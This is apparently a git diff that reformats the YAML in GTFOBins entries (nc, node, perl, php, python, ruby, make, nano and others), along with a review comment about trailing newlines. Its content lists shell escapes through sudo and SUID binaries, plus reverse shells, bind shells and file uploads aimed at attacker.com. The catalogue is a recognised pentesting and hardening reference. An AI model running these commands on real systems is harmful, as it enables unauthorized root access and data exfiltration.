@@ -1,17 +1,17 @@ --- functions: execute-interactive: - - description: This creates a valid Mbox file which may be required by the binary. - code: | - TF=$(mktemp) - echo "From nobody@localhost $(date)" > $TF - mail -f $TF - !/bin/sh + - description: This creates a valid Mbox file which may be required by the binary. + code: | + TF=$(mktemp) + echo "From nobody@localhost $(date)" > $TF + mail -f $TF + !/bin/sh sudo-enabled: - - description: This creates a valid Mbox file which may be required by the binary. - code: | - TF=$(mktemp) - echo "From nobody@localhost $(date)" > $TF - sudo mail -f $TF - !/bin/sh + - description: This creates a valid Mbox file which may be required by the binary. + code: | + TF=$(mktemp) + echo "From nobody@localhost $(date)" > $TF + sudo mail -f $TF + !/bin/sh --- diff --git a/_gtfobins/make.md b/_gtfobins/make.md index 4153bdf..3a0f825 100644 --- a/_gtfobins/make.md +++ b/_gtfobins/make.md 
@@ -1,24 +1,21 @@ --- -description: | - All these examples only work with GNU `make` due to the lack of support of the - `--eval` flag. The same can be achieved by using a proper `Makefile` or by - passing the content via stdin using `-f -`. +description: All these examples only work with GNU `make` due to the lack of support of the `--eval` flag. The same can be achieved by using a proper `Makefile` or by passing the content via stdin using `-f -`. functions: execute-interactive: - - code: | - COMMAND='/bin/sh' - make -s --eval=$'x:\n\t-'"$COMMAND" + - code: | + COMMAND='/bin/sh' + make -s --eval=$'x:\n\t-'"$COMMAND" file-write: - - description: Requires a newer GNU `make` version. - code: | - LFILE=file_to_write - make -s --eval="\$(file >$LFILE,data)" . + - description: Requires a newer GNU `make` version. + code: | + LFILE=file_to_write + make -s --eval="\$(file >$LFILE,data)" . suid-enabled: - - code: | - COMMAND='/bin/sh -p' - ./make -s --eval=$'x:\n\t-'"$COMMAND" + - code: | + COMMAND='/bin/sh -p' + ./make -s --eval=$'x:\n\t-'"$COMMAND" sudo-enabled: - - code: | - COMMAND='/bin/sh' - sudo make -s --eval=$'x:\n\t-'"$COMMAND" + - code: | + COMMAND='/bin/sh' + sudo make -s --eval=$'x:\n\t-'"$COMMAND" --- diff --git a/_gtfobins/man.md b/_gtfobins/man.md index 8ccabe2..c93bb1c 100644 --- a/_gtfobins/man.md +++ b/_gtfobins/man.md @@ -1,19 +1,17 @@ --- functions: execute-interactive: - - code: | - man man - !/bin/sh + - code: | + man man + !/bin/sh file-read: - - code: 'man file_to_read - -' + - code: man file_to_read sudo-enabled: - - code: | - sudo man man - !/bin/sh + - code: | + sudo man man + !/bin/sh suid-limited: - - code: | - ./man man - !/bin/sh + - code: | + ./man man + !/bin/sh --- diff --git a/_gtfobins/more.md b/_gtfobins/more.md index 823fa04..8605381 100644 --- a/_gtfobins/more.md +++ b/_gtfobins/more.md 
@@ -1,17 +1,15 @@ --- functions: execute-interactive: - - code: | - TERM= more /etc/profile - !/bin/sh + - code: | + TERM= more /etc/profile + !/bin/sh file-read: - - code: 'more file_to_read - -' + - code: more file_to_read suid-enabled: - - code: "./more file_to_read\n" + - code: "./more file_to_read\n" sudo-enabled: - - code: | - TERM= sudo -E more /etc/profile - !/bin/sh + - code: | + TERM= sudo -E more /etc/profile + !/bin/sh --- diff --git a/_gtfobins/mount.md b/_gtfobins/mount.md index 104e35e..1af15a4 100644 --- a/_gtfobins/mount.md +++ b/_gtfobins/mount.md @@ -1,8 +1,8 @@ --- functions: sudo-enabled: - - description: Exploit the fact that `mount` can be executed via `sudo` to *replace* the `mount` binary with a shell. - code: | - sudo mount -o bind /bin/sh /bin/mount - sudo mount + - description: Exploit the fact that `mount` can be executed via `sudo` to *replace* the `mount` binary with a shell. + code: | + sudo mount -o bind /bin/sh /bin/mount + sudo mount --- diff --git a/_gtfobins/nano.md b/_gtfobins/nano.md index d45f451..6e0d586 100644 --- a/_gtfobins/nano.md +++ b/_gtfobins/nano.md 
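Review bot: The file-read entry in the more.md hunk changes its `code:` value from a quoted scalar that ended in a newline (`'more file_to_read`, a blank line, then the closing quote, which YAML folds to `more file_to_read\n`) to the plain scalar `more file_to_read`, which has no trailing newline, while the untouched suid-enabled entry two lines below still carries it as `"./more file_to_read\n"`. If the trailing newline is meaningful to the renderer, the two entries in the same file will now display differently; either change suid-enabled to `code: ./more file_to_read` as well, or keep the newline on file-read. The same newline drop is made in the ed.md, emacs.md, less.md, man.md and nano.md hunks, where no sibling entry keeps it, so whichever convention is chosen should be applied across all of them.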
@@ -1,38 +1,36 @@ --- functions: execute-non-interactive: - - description: After running this exit the editor to see the command output. - code: | - COMMAND=id - TF=$(mktemp) - echo "$COMMAND" > $TF - chmod +x $TF - nano -s $TF /etc/hosts - ^T + - description: After running this exit the editor to see the command output. + code: | + COMMAND=id + TF=$(mktemp) + echo "$COMMAND" > $TF + chmod +x $TF + nano -s $TF /etc/hosts + ^T file-write: - - code: | - nano file_to_write - ^O + - code: | + nano file_to_write + ^O file-read: - - code: 'nano file_to_read - -' + - code: nano file_to_read suid-enabled: - - description: After running this exit the editor to see the command output. - code: | - COMMAND=id - TF=$(mktemp) - echo $'#!/bin/sh -p\n'"$COMMAND" > $TF - chmod +x $TF - ./nano -s $TF /etc/hosts - ^T + - description: After running this exit the editor to see the command output. + code: | + COMMAND=id + TF=$(mktemp) + echo $'#!/bin/sh -p\n'"$COMMAND" > $TF + chmod +x $TF + ./nano -s $TF /etc/hosts + ^T sudo-enabled: - - description: After running this exit the editor to see the command output. - code: | - COMMAND=id - TF=$(mktemp) - echo "$COMMAND" > $TF - chmod +x $TF - sudo nano -s $TF /etc/hosts - ^T + - description: After running this exit the editor to see the command output. + code: | + COMMAND=id + TF=$(mktemp) + echo "$COMMAND" > $TF + chmod +x $TF + sudo nano -s $TF /etc/hosts + ^T --- diff --git a/_gtfobins/nc.md b/_gtfobins/nc.md index b285423..39dad06 100644 --- a/_gtfobins/nc.md +++ b/_gtfobins/nc.md 
@@ -1,29 +1,27 @@ --- functions: reverse-shell-interactive: - - description: Run `nc -l -p 12345` on the attacker box to receive the shell. - code: | - RHOST=attacker.com - RPORT=12345 - nc -e /bin/sh $RHOST $RPORT + - description: Run `nc -l -p 12345` on the attacker box to receive the shell. + code: | + RHOST=attacker.com + RPORT=12345 + nc -e /bin/sh $RHOST $RPORT bind-shell-interactive: - - description: Run `nc target.com 12345` on the attacker box to connect to the shell. - code: | - LPORT=12345 - nc -l -p $LPORT -e /bin/sh + - description: Run `nc target.com 12345` on the attacker box to connect to the shell. + code: | + LPORT=12345 + nc -l -p $LPORT -e /bin/sh upload: - - description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` - on the attacker box to collect the file. - code: | - RHOST=attacker.com - RPORT=12345 - LFILE=file_to_send - nc $RHOST $RPORT < "$LFILE" + - description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. + code: | + RHOST=attacker.com + RPORT=12345 + LFILE=file_to_send + nc $RHOST $RPORT < "$LFILE" download: - - description: Fetch remote file from a remote TCP port. Run `nc target.com 12345 - < "file_to_send"` on the attacker box to send the file. - code: | - LPORT=12345 - LFILE=file_to_save - nc -l -p $LPORT > "$LFILE" + - description: Fetch remote file from a remote TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file. + code: | + LPORT=12345 + LFILE=file_to_save + nc -l -p $LPORT > "$LFILE" --- diff --git a/_gtfobins/nl.md b/_gtfobins/nl.md index 4d57bd2..c612274 100644 --- a/_gtfobins/nl.md +++ b/_gtfobins/nl.md 
@@ -1,19 +1,16 @@ --- -description: 'The read file content is corrupted by a leading space added to each - line. - -' +description: The read file content is corrupted by a leading space added to each line. functions: file-read: - - code: | - LFILE=file_to_read - nl -bn -w1 -s '' $LFILE + - code: | + LFILE=file_to_read + nl -bn -w1 -s '' $LFILE suid-enabled: - - code: | - LFILE=file_to_read - ./nl -bn -w1 -s '' $LFILE + - code: | + LFILE=file_to_read + ./nl -bn -w1 -s '' $LFILE sudo-enabled: - - code: | - LFILE=file_to_read - sudo nl -bn -w1 -s '' $LFILE + - code: | + LFILE=file_to_read + sudo nl -bn -w1 -s '' $LFILE --- diff --git a/_gtfobins/node.md b/_gtfobins/node.md index 214c045..622f2bf 100644 --- a/_gtfobins/node.md +++ b/_gtfobins/node.md 
@@ -1,38 +1,33 @@ --- functions: execute-interactive: - - code: 'node -e ''require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'' - -' + - code: | + node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});' reverse-shell-interactive: - - description: Run `nc -l -p 12345` on the attacker box to receive the shell. - code: | - export RHOST=attacker.com - export RPORT=12345 - node -e 'sh = require("child_process").spawn("/bin/sh"); - net.connect(process.env.RPORT, process.env.RHOST, function () { - this.pipe(sh.stdin); - sh.stdout.pipe(this); - sh.stderr.pipe(this); - });' + - description: Run `nc -l -p 12345` on the attacker box to receive the shell. + code: | + export RHOST=attacker.com + export RPORT=12345 + node -e 'sh = require("child_process").spawn("/bin/sh"); + net.connect(process.env.RPORT, process.env.RHOST, function () { + this.pipe(sh.stdin); + sh.stdout.pipe(this); + sh.stderr.pipe(this); + });' bind-shell-interactive: - - description: Run `nc target.com 12345` on the attacker box to connect to the shell. - code: | - export LPORT=12345 - node -e 'sh = require("child_process").spawn("/bin/sh"); - require("net").createServer(function (client) { - client.pipe(sh.stdin); - sh.stdout.pipe(client); - sh.stderr.pipe(client); - }).listen(process.env.LPORT);' + - description: Run `nc target.com 12345` on the attacker box to connect to the shell. 
+ code: | + export LPORT=12345 + node -e 'sh = require("child_process").spawn("/bin/sh"); + require("net").createServer(function (client) { + client.pipe(sh.stdin); + sh.stdout.pipe(client); + sh.stderr.pipe(client); + }).listen(process.env.LPORT);' suid-enabled: - - code: './node -e ''require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, - 1, 2]});'' - -' + - code: | + ./node -e 'require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]});' sudo-enabled: - - code: 'sudo node -e ''require("child_process").spawn("/bin/sh", {stdio: [0, 1, - 2]});'' - -' + - code: | + sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});' --- diff --git a/_gtfobins/od.md b/_gtfobins/od.md index 8644d85..4a82e45 100644 --- a/_gtfobins/od.md +++ b/_gtfobins/od.md @@ -1,18 +1,16 @@ --- -description: | - Three spaces are added before each character in the read file, and - non-printable chars are printed as backslash escape sequences. +description: Three spaces are added before each character in the read file, and non-printable chars are printed as backslash escape sequences. functions: file-read: - - code: | - LFILE=file_to_read - od -An -c -w9999 "$LFILE" + - code: | + LFILE=file_to_read + od -An -c -w9999 "$LFILE" suid-enabled: - - code: | - LFILE=file_to_read - ./od -An -c -w9999 "$LFILE" + - code: | + LFILE=file_to_read + ./od -An -c -w9999 "$LFILE" sudo-enabled: - - code: | - LFILE=file_to_read - sudo od -An -c -w9999 "$LFILE" + - code: | + LFILE=file_to_read + sudo od -An -c -w9999 "$LFILE" --- diff --git a/_gtfobins/perl.md b/_gtfobins/perl.md index f781b65..d3c0e0f 100644 --- a/_gtfobins/perl.md +++ b/_gtfobins/perl.md 
@@ -1,15 +1,15 @@ --- functions: execute-interactive: - - code: perl -e 'exec "/bin/sh";' + - code: perl -e 'exec "/bin/sh";' reverse-shell-interactive: - - description: Run `nc -l -p 12345` on the attacker box to receive the shell. - code: | - export RHOST=attacker.com - export RPORT=12345 - perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' + - description: Run `nc -l -p 12345` on the attacker box to receive the shell. + code: | + export RHOST=attacker.com + export RPORT=12345 + perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' suid-enabled: - - code: ./perl -e 'exec "/bin/sh";' + - code: ./perl -e 'exec "/bin/sh";' sudo-enabled: - - code: sudo perl -e 'exec "/bin/sh";' + - code: sudo perl -e 'exec "/bin/sh";' --- diff --git a/_gtfobins/php.md b/_gtfobins/php.md index ca9e4ea..05f41ea 100644 --- a/_gtfobins/php.md +++ b/_gtfobins/php.md 
@@ -1,50 +1,49 @@ --- functions: execute-interactive: - - code: | - export CMD="/bin/sh" - php -r 'system(getenv("CMD"));' - - code: | - export CMD="/bin/sh" - php -r 'passthru(getenv("CMD"));' - - code: | - export CMD="/bin/sh" - php -r 'print(shell_exec(getenv("CMD")));' - - code: | - export CMD="/bin/sh" - php -r '$r=array(); exec(getenv("CMD"), $r); print(join("\\n",$r));' - - code: | - export CMD="/bin/sh" - php -r '$h=@popen(getenv("CMD"),"r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }' + - code: | + export CMD="/bin/sh" + php -r 'system(getenv("CMD"));' + - code: | + export CMD="/bin/sh" + php -r 'passthru(getenv("CMD"));' + - code: | + export CMD="/bin/sh" + php -r 'print(shell_exec(getenv("CMD")));' + - code: | + export CMD="/bin/sh" + php -r '$r=array(); exec(getenv("CMD"), $r); print(join("\\n",$r));' + - code: | + export CMD="/bin/sh" + php -r '$h=@popen(getenv("CMD"),"r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }' execute-non-interactive: - - code: | - export CMD="id" - php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open(getenv("CMD"), $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}' + - code: | + export CMD="id" + php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open(getenv("CMD"), $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}' reverse-shell-interactive: - - description: Run `nc -l -p 12345` on the attacker box to receive the shell. 
- code: | - export RHOST=attacker.com - export RPORT=12345 - php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");' + - description: Run `nc -l -p 12345` on the attacker box to receive the shell. + code: | + export RHOST=attacker.com + export RPORT=12345 + php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");' upload: - - description: Serve files in the local folder running an HTTP server. This requires - PHP version 5.4 or later. - code: | - LHOST=0.0.0.0 - LPORT=8888 - php -S $LHOST:$LPORT + - description: Serve files in the local folder running an HTTP server. This requires PHP version 5.4 or later. + code: | + LHOST=0.0.0.0 + LPORT=8888 + php -S $LHOST:$LPORT download: - - description: Fetch a remote file via HTTP GET request. - code: | - export URL=http://attacker.com/file_to_get - export LFILE=file_to_save - php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);' + - description: Fetch a remote file via HTTP GET request. + code: | + export URL=http://attacker.com/file_to_get + export LFILE=file_to_save + php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);' suid-enabled: - - code: | - CMD="/bin/sh" - ./php -r "system('$CMD');" + - code: | + CMD="/bin/sh" + ./php -r "system('$CMD');" sudo-enabled: - - code: | - CMD="/bin/sh" - sudo php -r "system('$CMD');" + - code: | + CMD="/bin/sh" + sudo php -r "system('$CMD');" --- diff --git a/_gtfobins/pico.md b/_gtfobins/pico.md index c64f482..b9562e8 100644 --- a/_gtfobins/pico.md +++ b/_gtfobins/pico.md 
@@ -1,38 +1,36 @@ --- functions: execute-non-interactive: - - description: After running this exit the editor to see the command output. - code: | - COMMAND=id - TF=$(mktemp) - echo "$COMMAND" > $TF - chmod +x $TF - pico -s $TF /etc/hosts - ^T + - description: After running this exit the editor to see the command output. + code: | + COMMAND=id + TF=$(mktemp) + echo "$COMMAND" > $TF + chmod +x $TF + pico -s $TF /etc/hosts + ^T file-write: - - code: | - pico file_to_write - ^O + - code: | + pico file_to_write + ^O file-read: - - code: 'pico file_to_read - -' + - code: pico file_to_read suid-enabled: - - description: After running this exit the editor to see the command output. - code: | - COMMAND=id - TF=$(mktemp) - echo $'#!/bin/sh -p\n'"$COMMAND" > $TF - chmod +x $TF - ./pico -s $TF /etc/hosts - ^T + - description: After running this exit the editor to see the command output. + code: | + COMMAND=id + TF=$(mktemp) + echo $'#!/bin/sh -p\n'"$COMMAND" > $TF + chmod +x $TF + ./pico -s $TF /etc/hosts + ^T sudo-enabled: - - description: After running this exit the editor to see the command output. - code: | - COMMAND=id - TF=$(mktemp) - echo "$COMMAND" > $TF - chmod +x $TF - sudo pico -s $TF /etc/hosts - ^T + - description: After running this exit the editor to see the command output. + code: | + COMMAND=id + TF=$(mktemp) + echo "$COMMAND" > $TF + chmod +x $TF + sudo pico -s $TF /etc/hosts + ^T --- diff --git a/_gtfobins/puppet.md b/_gtfobins/puppet.md index a4ae2d9..868bf80 100644 --- a/_gtfobins/puppet.md +++ b/_gtfobins/puppet.md 
@@ -1,24 +1,23 @@ --- functions: execute-non-interactive: - - description: The executed command output shown in the puppet log format. - code: | - export CMD="/usr/bin/id" - puppet apply -e "exec { '$CMD': logoutput => true }" + - description: The executed command output shown in the puppet log format. + code: | + export CMD="/usr/bin/id" + puppet apply -e "exec { '$CMD': logoutput => true }" file-write: - - description: The file path must be absolute. - code: | - export LFILE="/tmp/file_to_write" - puppet apply -e "file { '$LFILE': content => 'data' }" + - description: The file path must be absolute. + code: | + export LFILE="/tmp/file_to_write" + puppet apply -e "file { '$LFILE': content => 'data' }" file-read: - - description: The read file content is corrupted by the `diff` output format. The - actual `/usr/bin/diff` command is executed. - code: | - export LFILE=file_to_read - puppet filebucket -l diff /dev/null $LFILE + - description: The read file content is corrupted by the `diff` output format. The actual `/usr/bin/diff` command is executed. + code: | + export LFILE=file_to_read + puppet filebucket -l diff /dev/null $LFILE sudo-enabled: - - description: The executed command output shown in the puppet log format. - code: | - export CMD="/usr/bin/id" - sudo puppet apply -e "exec { '$CMD': logoutput => true }" + - description: The executed command output shown in the puppet log format. + code: | + export CMD="/usr/bin/id" + sudo puppet apply -e "exec { '$CMD': logoutput => true }" --- diff --git a/_gtfobins/python2.md b/_gtfobins/python2.md index f2cce96..6f7aa79 100644 --- a/_gtfobins/python2.md +++ b/_gtfobins/python2.md 
@@ -1,39 +1,37 @@ --- functions: execute-interactive: - - code: python2 -c 'import os; os.system("/bin/sh")' + - code: python2 -c 'import os; os.system("/bin/sh")' reverse-shell-interactive: - - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on - the attacker box to receive the shell. - code: | - export RHOST=attacker.com - export RPORT=12345 - python2 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")' + - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on the attacker box to receive the shell. + code: | + export RHOST=attacker.com + export RPORT=12345 + python2 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")' upload: - - description: Send local file via "d" parameter of a HTTP POST request. Run an - HTTP service on the attacker box to collect the file. - code: | - export URL=http://attacker.com/ - export LFILE=file_to_send - python2 -c 'import urllib as u,urllib2 as u2,os.environ as e; u2.urlopen(u2.Request(e["URL"],u.urlencode({"d":open(e["LFILE"]).read()})))' - - description: Serve files in the local folder running an HTTP server. - code: | - export LPORT=8888 - python2 -m SimpleHTTPServer $LPORT + - description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file. + code: | + export URL=http://attacker.com/ + export LFILE=file_to_send + python2 -c 'import urllib as u,urllib2 as u2,os.environ as e; u2.urlopen(u2.Request(e["URL"],u.urlencode({"d":open(e["LFILE"]).read()})))' + - description: Serve files in the local folder running an HTTP server. + code: | + export LPORT=8888 + python2 -m SimpleHTTPServer $LPORT download: - - description: Fetch a remote file via HTTP GET request. 
- code: | - export URL=http://attacker.com/file_to_get - export LFILE=file_to_save - python2 -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])' + - description: Fetch a remote file via HTTP GET request. + code: | + export URL=http://attacker.com/file_to_get + export LFILE=file_to_save + python2 -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])' file-write: - - code: python2 -c 'open("file_to_write","w+").write("data")' + - code: python2 -c 'open("file_to_write","w+").write("data")' file-read: - - code: python2 -c 'open("file_to_read").read()' + - code: python2 -c 'open("file_to_read").read()' load-library: - - code: python2 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' + - code: python2 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' suid-enabled: - - code: ./python2 -c 'import os; os.system("/bin/sh -p")' + - code: ./python2 -c 'import os; os.system("/bin/sh -p")' sudo-enabled: - - code: sudo python2 -c 'import os; os.system("/bin/sh")' + - code: sudo python2 -c 'import os; os.system("/bin/sh")' --- diff --git a/_gtfobins/python3.md b/_gtfobins/python3.md index 719151a..469a231 100644 --- a/_gtfobins/python3.md +++ b/_gtfobins/python3.md 
@@ -1,39 +1,37 @@ --- functions: execute-interactive: - - code: python3 -c 'import os; os.system("/bin/sh")' + - code: python3 -c 'import os; os.system("/bin/sh")' reverse-shell-interactive: - - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on - the attacker box to receive the shell. - code: | - export RHOST=attacker.com - export RPORT=12345 - python3 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")' + - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on the attacker box to receive the shell. + code: | + export RHOST=attacker.com + export RPORT=12345 + python3 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")' upload: - - description: Send local file via "d" parameter of a HTTP POST request. Run an - HTTP service on the attacker box to collect the file. - code: | - export URL=http://attacker.com/ - export LFILE=file_to_send - python3 -c 'import urllib.request as r,urllib.parse as u;from os import environ as e; r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))' - - description: Serve files in the local folder running an HTTP server. - code: | - LPORT=8888 - python3 -m http.server $LPORT + - description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file. + code: | + export URL=http://attacker.com/ + export LFILE=file_to_send + python3 -c 'import urllib.request as r,urllib.parse as u;from os import environ as e; r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))' + - description: Serve files in the local folder running an HTTP server. + code: | + LPORT=8888 + python3 -m http.server $LPORT download: - - description: Fetch a remote file via HTTP GET request. 
- code: | - export URL=http://attacker.com/file_to_get - export LFILE=file_to_save - python3 -c 'import urllib.request as u;from os import environ as e; u.urlretrieve (e["URL"], e["LFILE"])' + - description: Fetch a remote file via HTTP GET request. + code: | + export URL=http://attacker.com/file_to_get + export LFILE=file_to_save + python3 -c 'import urllib.request as u;from os import environ as e; u.urlretrieve (e["URL"], e["LFILE"])' file-write: - - code: python3 -c 'open("file_to_write","w+").write("data")' + - code: python3 -c 'open("file_to_write","w+").write("data")' file-read: - - code: python3 -c 'open("file_to_read").read()' + - code: python3 -c 'open("file_to_read").read()' load-library: - - code: python3 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' + - code: python3 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' suid-enabled: - - code: ./python3 -c 'import os; os.system("/bin/sh -p")' + - code: ./python3 -c 'import os; os.system("/bin/sh -p")' sudo-enabled: - - code: sudo python3 -c 'import os; os.system("/bin/sh")' + - code: sudo python3 -c 'import os; os.system("/bin/sh")' --- diff --git a/_gtfobins/rlwrap.md b/_gtfobins/rlwrap.md index 254f12d..fd3b8a6 100644 --- a/_gtfobins/rlwrap.md +++ b/_gtfobins/rlwrap.md @@ -1,15 +1,14 @@ --- functions: execute-interactive: - - code: rlwrap /bin/sh + - code: rlwrap /bin/sh file-write: - - description: This adds timestamps to the output file. This relies on the external - `echo` command. - code: | - LFILE=file_to_write - rlwrap -l "$LFILE" echo data + - description: This adds timestamps to the output file. This relies on the external `echo` command. + code: | + LFILE=file_to_write + rlwrap -l "$LFILE" echo data suid-enabled: - - code: "./rlwrap -H /dev/null /bin/sh -p" + - code: ./rlwrap -H /dev/null /bin/sh -p sudo-enabled: - - code: sudo rlwrap /bin/sh + - code: sudo rlwrap /bin/sh --- diff --git a/_gtfobins/rpm.md b/_gtfobins/rpm.md index 268c69f..e852209 100644 --- a/_gtfobins/rpm.md 
+++ b/_gtfobins/rpm.md @@ -1,9 +1,9 @@ --- functions: execute-interactive: - - code: rpm --eval '%{lua:posix.exec("/bin/sh")}' + - code: rpm --eval '%{lua:posix.exec("/bin/sh")}' suid-enabled: - - code: ./rpm --eval '%{lua:posix.exec("/bin/sh", "-p")}' + - code: ./rpm --eval '%{lua:posix.exec("/bin/sh", "-p")}' sudo-enabled: - - code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}' + - code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}' --- diff --git a/_gtfobins/rpmquery.md b/_gtfobins/rpmquery.md index ce85849..9ec5af8 100644 --- a/_gtfobins/rpmquery.md +++ b/_gtfobins/rpmquery.md @@ -1,9 +1,9 @@ --- functions: execute-interactive: - - code: rpmquery --eval '%{lua:posix.exec("/bin/sh")}' + - code: rpmquery --eval '%{lua:posix.exec("/bin/sh")}' suid-enabled: - - code: ./rpmquery --eval '%{lua:posix.exec("/bin/sh", "-p")}' + - code: ./rpmquery --eval '%{lua:posix.exec("/bin/sh", "-p")}' sudo-enabled: - - code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}' + - code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}' --- diff --git a/_gtfobins/ruby.md b/_gtfobins/ruby.md index 1039257..e24cc96 100644 --- a/_gtfobins/ruby.md +++ b/_gtfobins/ruby.md 
@@ -1,33 +1,32 @@ --- functions: execute-interactive: - - code: ruby -e 'exec "/bin/sh"' + - code: ruby -e 'exec "/bin/sh"' reverse-shell-interactive: - - description: Run `nc -l -p 12345` on the attacker box to receive the shell. - code: | - export RHOST=attacker.com - export RPORT=12345 - ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' + - description: Run `nc -l -p 12345` on the attacker box to receive the shell. + code: | + export RHOST=attacker.com + export RPORT=12345 + ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' upload: - - description: Serve files in the local folder running an HTTP server. This requires - version 1.9.2 or later. - code: | - export LPORT=8888 - ruby -run -e httpd . -p $LPORT + - description: Serve files in the local folder running an HTTP server. This requires version 1.9.2 or later. + code: | + export LPORT=8888 + ruby -run -e httpd . -p $LPORT download: - - description: Fetch a remote file via HTTP GET request. - code: | - export RHOST=attacker.com - export RPORT=12345 - export RFILE=/file_to_get - export LFILE=file_to_save - ruby -e 'require "net/http"; Net::HTTP.start(ENV["RHOST"], ENV["RPORT"]) { |http| r = http.get(ENV["RFILE"]); open(ENV["LFILE"], "wb") { |file| file.write(r.body) } }' + - description: Fetch a remote file via HTTP GET request. 
+ code: | + export RHOST=attacker.com + export RPORT=12345 + export RFILE=/file_to_get + export LFILE=file_to_save + ruby -e 'require "net/http"; Net::HTTP.start(ENV["RHOST"], ENV["RPORT"]) { |http| r = http.get(ENV["RFILE"]); open(ENV["LFILE"], "wb") { |file| file.write(r.body) } }' file-write: - - code: ruby -e 'File.open("file_to_write", "w+") { |f| f.write("data") }' + - code: ruby -e 'File.open("file_to_write", "w+") { |f| f.write("data") }' file-read: - - code: ruby -e 'puts File.read("file_to_read")' + - code: ruby -e 'puts File.read("file_to_read")' load-library: - - code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")' + - code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")' sudo-enabled: - - code: sudo ruby -e 'exec "/bin/sh"' + - code: sudo ruby -e 'exec "/bin/sh"' --- diff --git a/_gtfobins/scp.md b/_gtfobins/scp.md index 711cf53..832fe00 100644 --- a/_gtfobins/scp.md +++ b/_gtfobins/scp.md 
